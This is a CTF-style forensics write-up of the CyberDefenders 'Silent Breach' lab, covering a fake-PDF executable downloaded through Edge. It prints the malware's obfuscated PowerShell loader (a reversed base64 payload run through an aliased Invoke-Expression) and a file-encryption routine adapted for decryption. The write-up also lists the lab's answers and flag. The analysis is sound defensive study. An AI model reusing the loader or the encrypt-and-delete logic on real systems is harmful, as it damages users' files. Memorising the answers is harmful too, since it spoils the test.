CyberDefenders - Silent Breach WriteUp

Lab: https://cyberdefenders.org/blueteam-ctf-challenges/silent-breach/

1. What is the MD5 hash of the potentially malicious EXE file the user downloaded?

Navigating to the Downloads' folder we can see right way a suspicious executable which attempts to camouflage as a PDF.

Get-FileHash -Algorithm md5 .\IMF-Info.pdf.exe

Answer

336A7CF476EBC7548C93507339196ABB

2. What is the URL from which the file was downloaded?

Since it has the Zone.Identifier metada it means the MOTW was applied to the file, therefore there are high changes this file was download via a browser.

Accordingly with Microsoft https://learn.microsoft.com/en-us/dotnet/api/system.security.securityzone?view=windowsdesktop-10.0 we also know with "ZoneId=3" that the file was download from the internet.

Answer

http://192.168.16.128:8000/IMF-Info.pdf.exe

3. What application did the user use to download this file?

Due to previous discoveries we will check the History file from the installed browsers:

Exported the History file from the Edge browser.

Open the file in SQLite and browsed the "downloads" Table.

There were in total 5 files downloaded from the suspicious URL, which matches with the suspicious filename found earlier.

Answer

Microsoft Edge

4. By examining Windows Mail artifacts, we found an email address mentioning three IP addresses of servers that are at risk or compromised. What are the IP addresses?

Checking the artifact "HxStore.hxd" that can be found in the following path "%LOCALAPPDATA%\Packages\Microsoft.windowscommunicationsapps_...\LocalState" we can retrieve additional information related to the windows mail app.

strings.exe .\HxStore.hxd | Select-String -Pattern '\b(?:\d{1,3}\.){3}\d{1,3}\b' | Sort-Object -Uniq

Answer

192.168.16.128, 212.33.10.112, 145.67.29.88

5. By examining the malicious executable, we found that it uses an obfuscated PowerShell script to decrypt specific files. What predefined password does the script use for encryption?

Starting by doing some static analysis with DiE we can identify tha packer used and the language used.

This malware was written in Node.js and then packed as a PE to run without the need to have Node.js installed. By researching a bit we figure out a repository vercel/pkg which takes js (node.js) code, and compiles it into v8 bytecode wrapping it into an executable.

After searching for available unpackers we can find the following repo: https://github.com/LockBlock-dev/pkg-unpacker.

npm start -- -i ./pkg_app.exe -o ./unpacked

Now we can run strings against it without getting much rubbish.

strings.exe .\main.js

Saving it to a file and cleaning the rubbish we get the following code:

$wy7qIGPnm36HpvjrL2TMUaRbz = "K0QfK0QZjJ3bG1CIlxWaGRXdw5WakASblRXStUmdv1WZSBCIgAiCNoQDpgSZz9GbD5SbhVmc0NFd19GJgACIgoQDpgSZz9GbD5SbhVmc0N1b0BXeyNGJgACIgoQDK0QKos2YvxmQsFmbpZEazVHbG5SbhVmc0N1b0BXeyNGJgACIgoQDpgGdn5WZM5yclRXeC5WahxGckACLwACLzVGd5JkbpFGbwRCKlRXaydlLtFWZyR3UvRHc5J3YkACIgAiCNoQDpUGdpJ3V6oTXlR2bN1WYlJHdT9GdwlncD5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBCLy9Gdwlncj5WZkACLtFWZyR3U0V3bkgSbhVmc0N1b0BXeyNkL5hGchJ3ZvRHc5J3QukHdpJXdjV2Uu0WZ0NXeTBCdjVmai9UL3VmTg0DItFWZyR3UvRHc5J3YkACIgAiCNkSZ0FWZyNkO60VZk9WTlxWaG5yTJ5SblR3c5N1WgwSZslmR0VHc0V3bkgSbhVmc0NVZslmRu8USu0WZ0NXeTBCdjVmai9UL3VmTg0DItFWZyR3U0V3bkACIgAiCNoQDpUGbpZEd1BnbpRCKzVGd5JEbsFEZhVmU6oTXlxWaG5yTJ5SblR3c5N1Wg0DIzVGd5JkbpFGbwRCIgACIK0gCNkCKy9Gdwlncj5WRlRXYlJ3QuMXZhRCI9AicvRHc5J3YuVGJgACIgoQDK0wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1Wg0DIn5WakRWYQ5yclFGJgACIgoQDDJ0Q6oTXlR2bNJXZoBXaD5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBSPgUGZv1kLzVWYkACIgAiCNYXakASPgYVSuMXZhRCIgACIK0QeltGJg0DI5V2SuMXZhRCIgACIK0QKoUGdhVmcDpjOdNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBSPgMXZhRCIgACIK0gCNcyYuVmLnACLnQiZkBnLcdCIlNWYsBXZy1CIlxWaGRXdw5WakASPgUGbpZEd1BHd19GJgACIgoQD7BSKzVGbpZEd1BnbpRCIulGIlxWaGRXdw5WakgCIoNWYlJ3bmpQDK0QKK0gImRGcu42bpN3cp1ULG1UScxFcvR3azVGRcxlbhhGdlxFXzJXZzVFXcpzQiACIgAiCNwiImRGcuQXZyNWZT1iRNlEXcB3b0t2clREXc5WYoRXZcx1cyV2cVxFX6MkIgACIgoQDoAEI9AyclxWaGRXdw5WakoQDzVGbpZGI0VHculGIm9GI0NXaMByIK0gCNkSZ6l2U2lGJoMXZ0lnQ0V2RuMXZ0lnQlZXayVGZkASPgYXakoQDpUmepNVeltGJoMXZ0lnQ0V2RuMXZ0lnQlZXayVGZkASPgkXZrRiCNkycu9Wa0FmclRXakACL0xWYzRCIsQmcvd3czFGckgyclRXeCVmdpJXZEhTO4IzYmJlL5hGchJ3ZvRHc5J3QukHdpJXdjV2Uu0WZ0NXeTBCdjVmai9UL3VmTg0DIzVGd5JUZ2lmclRGJK0gCNAiNxASPgUmepNldpRiCNACIgIzMg0DIlpXaTlXZrRiCNADMwATMg0DIz52bpRXYyVGdpRiCNkCOwgHMscDM4BDL2ADewwSNwgHMsQDM4BDLzADewwiMwgHMsEDM4BDKd11WlRXeCtFI9ACdsF2ckoQDiQyYlNVNyAjMj8mZuFiZtlkIg0DIkJ3b3N3chBHJ" ;
$9U5RgiwHSYtbsoLuD3Vf6 = $wy7qIGPnm36HpvjrL2TMUaRbz.ToCharArray() ; [array]::Reverse($9U5RgiwHSYtbsoLuD3Vf6) ; -join $9U5RgiwHSYtbsoLuD3Vf6 2>&1> $null ;
$FHG7xpKlVqaDNgu1c2Utw = [systeM.tEXT.ENCODIng]::uTf8.geTStRInG([sYsTeM.CoNVeRt]::FROMBase64StRIng("$9U5RgiwHSYtbsoLuD3Vf6")) ;
$9ozWfHXdm8eIBYru = "InV"+"okE"+"-ex"+"prE"+"SsI"+"ON";
new-aliaS -Name PwN -ValUe $9ozWfHXdm8eIBYru -fOrce;
pwn $FHG7xpKlVqaDNgu1c2Utw;

To analyse the script I will use Powershell_ISE, I will set a breakpoint in the last line since it is the one that will actually execute the obfuscated code.

Answer

Imf!nfo#2025Sec$

6. After identifying how the script works, decrypt the files and submit the secret string.

Before analysing it, let's now save this de-obfuscated code into main2.ps1 to have a better readability.

echo $FHG7xpKlVqaDNgu1c2Utw > main2.ps1

Looking back at the PS code we find two new artifacts: IMF-Secret.pdf and IMF-Mission.pdf which the code is encrypting using the AES algorithm.

Going to FTK-Imager we can find those files, let's extract them so we can decrypt them.

To decrypt the files I read the following documentation: https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aes?view=net-10.0.

Just by adjusting the code to point to our paths and adding running the CreateEncryptor() function did the trick. Here is the code that I used with my modifications:

$password = "Imf!nfo#2025Sec$"
$salt = [Byte[]](0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08)
$iterations = 10000
$keySize = 32   
$ivSize = 16 

$deriveBytes = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($password, $salt, $iterations)
$key = $deriveBytes.GetBytes($keySize)
$iv = $deriveBytes.GetBytes($ivSize)

# List of input files
$inputFiles = @(
    "C:\\Users\\Rev\Desktop\\Silent_Breach\\IMF-Secret.enc",  # POINT TO MY FPATH
    "C:\\Users\\Rev\\Desktop\\Silent_Breach\\IMF-Mission.enc" # POINT TO MY FPATH
)

foreach ($inputFile in $inputFiles) {
    #$outputFile = $inputFile -replace '\.pdf$', '.enc'
    $outputFile = $inputFile -replace '\.enc$', '.pdf' # SWITCH THE LOGIC, I HAVE THE ENC FILES


    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $key
    $aes.IV = $iv
    $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7

    #$encryptor = $aes.CreateEncryptor()
    $encryptor = $aes.CreateDecryptor()               # CreateDecryptor() is the function that we need

    $plainBytes = [System.IO.File]::ReadAllBytes($inputFile)

    $outStream = New-Object System.IO.FileStream($outputFile, [System.IO.FileMode]::Create)
    $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($outStream, $encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)

    $cryptoStream.Write($plainBytes, 0, $plainBytes.Length)
    $cryptoStream.FlushFinalBlock()

    $cryptoStream.Close()
    $outStream.Close()

    Remove-Item $inputFile -Force
}

Answer

CyberDefenders{N3v3r_eX3cuTe_F!l3$dOwnL0ded_fr0m_M@lic10u5$erV3r}